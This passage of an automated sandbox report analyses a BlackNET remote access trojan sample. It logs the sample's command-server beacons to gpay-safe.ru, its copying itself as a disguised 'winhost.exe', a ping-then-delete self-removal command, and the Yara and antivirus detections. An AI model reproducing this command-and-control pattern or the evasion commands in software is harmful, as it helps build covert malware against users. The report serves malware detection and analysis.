                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 67 70 61 79 2d 73 61 66 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at gpay-safe.ru Port 80</address></body></html>
                                          Aug 25, 2021 00:49:30.766211987 CEST1332OUTGET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
                                          Host: gpay-safe.ru
                                          Aug 25, 2021 00:49:30.866970062 CEST1333INHTTP/1.1 404 Not Found
                                          Date: Tue, 24 Aug 2021 22:49:30 GMT
                                          Server: Apache/2.4.29 (Ubuntu)
                                          Content-Length: 274
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 67 70 61 79 2d 73 61 66 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at gpay-safe.ru Port 80</address></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          4192.168.2.44973091.206.93.21680C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
                                          TimestampkBytes transferredDirectionData
                                          Aug 25, 2021 00:49:34.147334099 CEST1344OUTGET /x/ HTTP/1.1
                                          Host: gpay-safe.ru
                                          Connection: Keep-Alive
                                          Aug 25, 2021 00:49:34.248711109 CEST1345INHTTP/1.1 404 Not Found
                                          Date: Tue, 24 Aug 2021 22:49:34 GMT
                                          Server: Apache/2.4.29 (Ubuntu)
                                          Content-Length: 274
                                          Keep-Alive: timeout=5, max=100
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 67 70 61 79 2d 73 61 66 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at gpay-safe.ru Port 80</address></body></html>
                                          Aug 25, 2021 00:49:34.260885000 CEST1345OUTGET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
                                          Host: gpay-safe.ru
                                          Aug 25, 2021 00:49:34.364558935 CEST1346INHTTP/1.1 404 Not Found
                                          Date: Tue, 24 Aug 2021 22:49:34 GMT
                                          Server: Apache/2.4.29 (Ubuntu)
                                          Content-Length: 274
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 67 70 61 79 2d 73 61 66 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at gpay-safe.ru Port 80</address></body></html>
                                          Aug 25, 2021 00:49:35.357151985 CEST1346OUTGET /x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
                                          Host: gpay-safe.ru
                                          Aug 25, 2021 00:49:35.458375931 CEST1347INHTTP/1.1 404 Not Found
                                          Date: Tue, 24 Aug 2021 22:49:35 GMT
                                          Server: Apache/2.4.29 (Ubuntu)
                                          Content-Length: 274
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 67 70 61 79 2d 73 61 66 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at gpay-safe.ru Port 80</address></body></html>
                                          Aug 25, 2021 00:49:35.487190008 CEST1347OUTGET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
                                          Host: gpay-safe.ru
                                          Aug 25, 2021 00:49:35.589535952 CEST1347INHTTP/1.1 404 Not Found
                                          Date: Tue, 24 Aug 2021 22:49:35 GMT
                                          Server: Apache/2.4.29 (Ubuntu)
                                          Content-Length: 274
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 67 70 61 79 2d 73 61 66 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at gpay-safe.ru Port 80</address></body></html>


                                          Code Manipulations

                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          Analysis Process: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe PID: 4804 Parent PID: 6556

                                          General

                                          Start time:00:49:01
                                          Start date:25/08/2021
                                          Path:C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe'
                                          Imagebase:0x9b0000
                                          File size:78336 bytes
                                          MD5 hash:BC15770F9C1C0735CB5CC9D800476AB0
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Yara matches:
                                          • Rule: JoeSecurity_BlackNET, Description: Yara detected BlackNET, Source: 00000000.00000002.664262498.00000000009B2000.00000002.00020000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_BlackNET, Description: Yara detected BlackNET, Source: 00000000.00000000.641714732.00000000009B2000.00000002.00020000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_BlackNET, Description: Yara detected BlackNET, Source: 00000000.00000002.666828004.0000000002F41000.00000004.00000001.sdmp, Author: Joe Security
                                          Reputation:low

                                          Chronological Activities

                                          Analysis Process: cmd.exe PID: 5936 Parent PID: 4804

                                          General

                                          Start time:00:49:10
                                          Start date:25/08/2021
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe'
                                          Imagebase:0x7ff622070000
                                          File size:273920 bytes
                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Chronological Activities

                                          Analysis Process: conhost.exe PID: 5204 Parent PID: 5936

                                          General

                                          Start time:00:49:10
                                          Start date:25/08/2021
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff724c50000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Chronological Activities

                                          Analysis Process: PING.EXE PID: 7100 Parent PID: 5936

                                          General

                                          Start time:00:49:11
                                          Start date:25/08/2021
                                          Path:C:\Windows\System32\PING.EXE
                                          Wow64 process (32bit):false
                                          Commandline:ping 1.1.1.1 -n 1 -w 4000
                                          Imagebase:0x7ff78a640000
                                          File size:21504 bytes
                                          MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate

                                          Chronological Activities

                                          Analysis Process: winhost.exe PID: 6944 Parent PID: 4804

                                          General

                                          Start time:00:49:11
                                          Start date:25/08/2021
                                          Path:C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe'
                                          Imagebase:0x720000
                                          File size:78336 bytes
                                          MD5 hash:BC15770F9C1C0735CB5CC9D800476AB0
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Yara matches:
                                          • Rule: JoeSecurity_BlackNET, Description: Yara detected BlackNET, Source: 00000008.00000002.674613084.0000000000722000.00000002.00020000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_BlackNET, Description: Yara detected BlackNET, Source: 00000008.00000000.662483550.0000000000722000.00000002.00020000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_BlackNET, Description: Yara detected BlackNET, Source: 00000008.00000002.679744908.0000000002FA0000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: SUSP_Modified_SystemExeFileName_in_File, Description: Detecst a variant of a system file name often used by attackers to cloak their activity, Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe, Author: Florian Roth
                                          • Rule: MAL_Winnti_Sample_May18_1, Description: Detects malware sample from Burning Umbrella report - Generic Winnti Rule, Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe, Author: Florian Roth
                                          • Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe, Author: Florian Roth
                                          • Rule: HKTL_NET_GUID_BlackNET, Description: Detects VB.NET red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe, Author: Arnim Rupp
                                          • Rule: JoeSecurity_BlackNET, Description: Yara detected BlackNET, Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe, Author: Joe Security
                                          Antivirus matches:
                                          • Detection: 100%, Avira
                                          • Detection: 100%, Joe Sandbox ML
                                          • Detection: 56%, Metadefender, Browse
                                          • Detection: 85%, ReversingLabs
                                          Reputation:low

                                          Chronological Activities

                                          Analysis Process: cmd.exe PID: 7060 Parent PID: 6944

                                          General

                                          Start time:00:49:15
                                          Start date:25/08/2021
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe'
                                          Imagebase:0x7ff622070000
                                          File size:273920 bytes
                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Chronological Activities

                                          Analysis Process: conhost.exe PID: 4864 Parent PID: 7060

                                          General

                                          Start time:00:49:15
                                          Start date:25/08/2021
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff724c50000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Chronological Activities

                                          Analysis Process: PING.EXE PID: 3028 Parent PID: 7060

                                          General

                                          Start time:00:49:16
                                          Start date:25/08/2021
                                          Path:C:\Windows\System32\PING.EXE
                                          Wow64 process (32bit):false
                                          Commandline:ping 1.1.1.1 -n 1 -w 4000
                                          Imagebase:0x7ff78a640000
                                          File size:21504 bytes
                                          MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate

                                          Chronological Activities

                                          Analysis Process: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe PID: 6336 Parent PID: 3424

                                          General

                                          Start time:00:49:21
                                          Start date:25/08/2021
                                          Path:C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe'
                                          Imagebase:0x810000
                                          File size:78336 bytes
                                          MD5 hash:BC15770F9C1C0735CB5CC9D800476AB0
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Yara matches:
                                          • Rule: JoeSecurity_BlackNET, Description: Yara detected BlackNET, Source: 0000000C.00000002.697281898.0000000000812000.00000002.00020000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_BlackNET, Description: Yara detected BlackNET, Source: 0000000C.00000000.685235797.0000000000812000.00000002.00020000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_BlackNET, Description: Yara detected BlackNET, Source: 0000000C.00000002.701069218.0000000002FF9000.00000004.00000001.sdmp, Author: Joe Security
                                          Reputation:low

                                          Chronological Activities

                                          Analysis Process: cmd.exe PID: 6036 Parent PID: 6336

                                          General

                                          Start time:00:49:25
                                          Start date:25/08/2021
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe'
                                          Imagebase:0x7ff622070000
                                          File size:273920 bytes
                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Chronological Activities

                                          Analysis Process: conhost.exe PID: 7144 Parent PID: 6036

                                          General

                                          Start time:00:49:25
                                          Start date:25/08/2021
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff724c50000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Chronological Activities

                                          Analysis Process: PING.EXE PID: 6752 Parent PID: 6036

                                          General

                                          Start time:00:49:26
                                          Start date:25/08/2021
                                          Path:C:\Windows\System32\PING.EXE
                                          Wow64 process (32bit):false
                                          Commandline:ping 1.1.1.1 -n 1 -w 4000
                                          Imagebase:0x7ff78a640000
                                          File size:21504 bytes
                                          MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate

                                          Chronological Activities

                                          Analysis Process: winhost.exe PID: 4112 Parent PID: 6336

                                          General

                                          Start time:00:49:26
                                          Start date:25/08/2021
                                          Path:C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe'
                                          Imagebase:0xae0000
                                          File size:78336 bytes
                                          MD5 hash:BC15770F9C1C0735CB5CC9D800476AB0
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Yara matches:
                                          • Rule: JoeSecurity_BlackNET, Description: Yara detected BlackNET, Source: 00000010.00000000.694369153.0000000000AE2000.00000002.00020000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_BlackNET, Description: Yara detected BlackNET, Source: 00000010.00000002.704585116.0000000000AE2000.00000002.00020000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_BlackNET, Description: Yara detected BlackNET, Source: 00000010.00000002.709960632.000000000336E000.00000004.00000001.sdmp, Author: Joe Security

                                          Chronological Activities

                                          Analysis Process: cmd.exe PID: 5580 Parent PID: 4112

                                          General

                                          Start time:00:49:29
                                          Start date:25/08/2021
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe'
                                          Imagebase:0x7ff622070000
                                          File size:273920 bytes
                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language

                                          Chronological Activities

                                          Analysis Process: winhost.exe PID: 7000 Parent PID: 3424

                                          General

                                          Start time:00:49:30
                                          Start date:25/08/2021
                                          Path:C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe'
                                          Imagebase:0x160000
                                          File size:78336 bytes
                                          MD5 hash:BC15770F9C1C0735CB5CC9D800476AB0
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Yara matches:
                                          • Rule: JoeSecurity_BlackNET, Description: Yara detected BlackNET, Source: 00000013.00000002.718658230.0000000000162000.00000002.00020000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_BlackNET, Description: Yara detected BlackNET, Source: 00000013.00000000.702548185.0000000000162000.00000002.00020000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_BlackNET, Description: Yara detected BlackNET, Source: 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmp, Author: Joe Security

                                          Chronological Activities

                                          Analysis Process: conhost.exe PID: 1852 Parent PID: 5580

                                          General

                                          Start time:00:49:30
                                          Start date:25/08/2021
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff724c50000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language

                                          Chronological Activities

                                          Analysis Process: PING.EXE PID: 6492 Parent PID: 5580

                                          General

                                          Start time:00:49:30
                                          Start date:25/08/2021
                                          Path:C:\Windows\System32\PING.EXE
                                          Wow64 process (32bit):false
                                          Commandline:ping 1.1.1.1 -n 1 -w 4000
                                          Imagebase:0x7ff78a640000
                                          File size:21504 bytes
                                          MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language

                                          Chronological Activities

                                          Analysis Process: cmd.exe PID: 6984 Parent PID: 7000

                                          General

                                          Start time:00:49:34
                                          Start date:25/08/2021
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe'
                                          Imagebase:0x7ff622070000
                                          File size:273920 bytes
                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language

                                          Chronological Activities

                                          Analysis Process: conhost.exe PID: 5936 Parent PID: 6984

                                          General

                                          Start time:00:49:35
                                          Start date:25/08/2021
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff724c50000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language

                                          Chronological Activities

                                          Analysis Process: PING.EXE PID: 5668 Parent PID: 6984

                                          General

                                          Start time:00:49:36
                                          Start date:25/08/2021
                                          Path:C:\Windows\System32\PING.EXE
                                          Wow64 process (32bit):false
                                          Commandline:ping 1.1.1.1 -n 1 -w 4000
                                          Imagebase:0x7ff78a640000
                                          File size:21504 bytes
                                          MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language

                                          Chronological Activities

                                          Disassembly

                                          Code Analysis

                                          Reset < >

                                            Analysis Process: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe PID: 4804 Parent PID: 6556 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeCOMMON

                                            Executed Functions

                                            Function 00007FFA35FB0588, Relevance: 5.2, Strings: 4, Instructions: 232COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.678863607.00007FFA35FB0000.00000040.00000001.sdmp, Offset: 00007FFA35FB0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID: s5$ s5$ s5$8.5
                                            • API String ID: 0-2748289946
                                            • Opcode ID: c10e5663eb1bb4a917957f5bfefea8ad8b13ce38541c9d7b845e8397c8f9d56f
                                            • Instruction ID: ec0ba836a519b742dfd2893d5dfb05cd8a2f318c559a2f6a640c3f38d90c1c76
                                            • Opcode Fuzzy Hash: c10e5663eb1bb4a917957f5bfefea8ad8b13ce38541c9d7b845e8397c8f9d56f
                                            • Instruction Fuzzy Hash: 16618270A1CA0ECFEB94EB1C84597B977E1FF5A300F5484B9E40EC7192DE29A805DB51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FB094E, Relevance: 3.0, Strings: 2, Instructions: 474COMMON
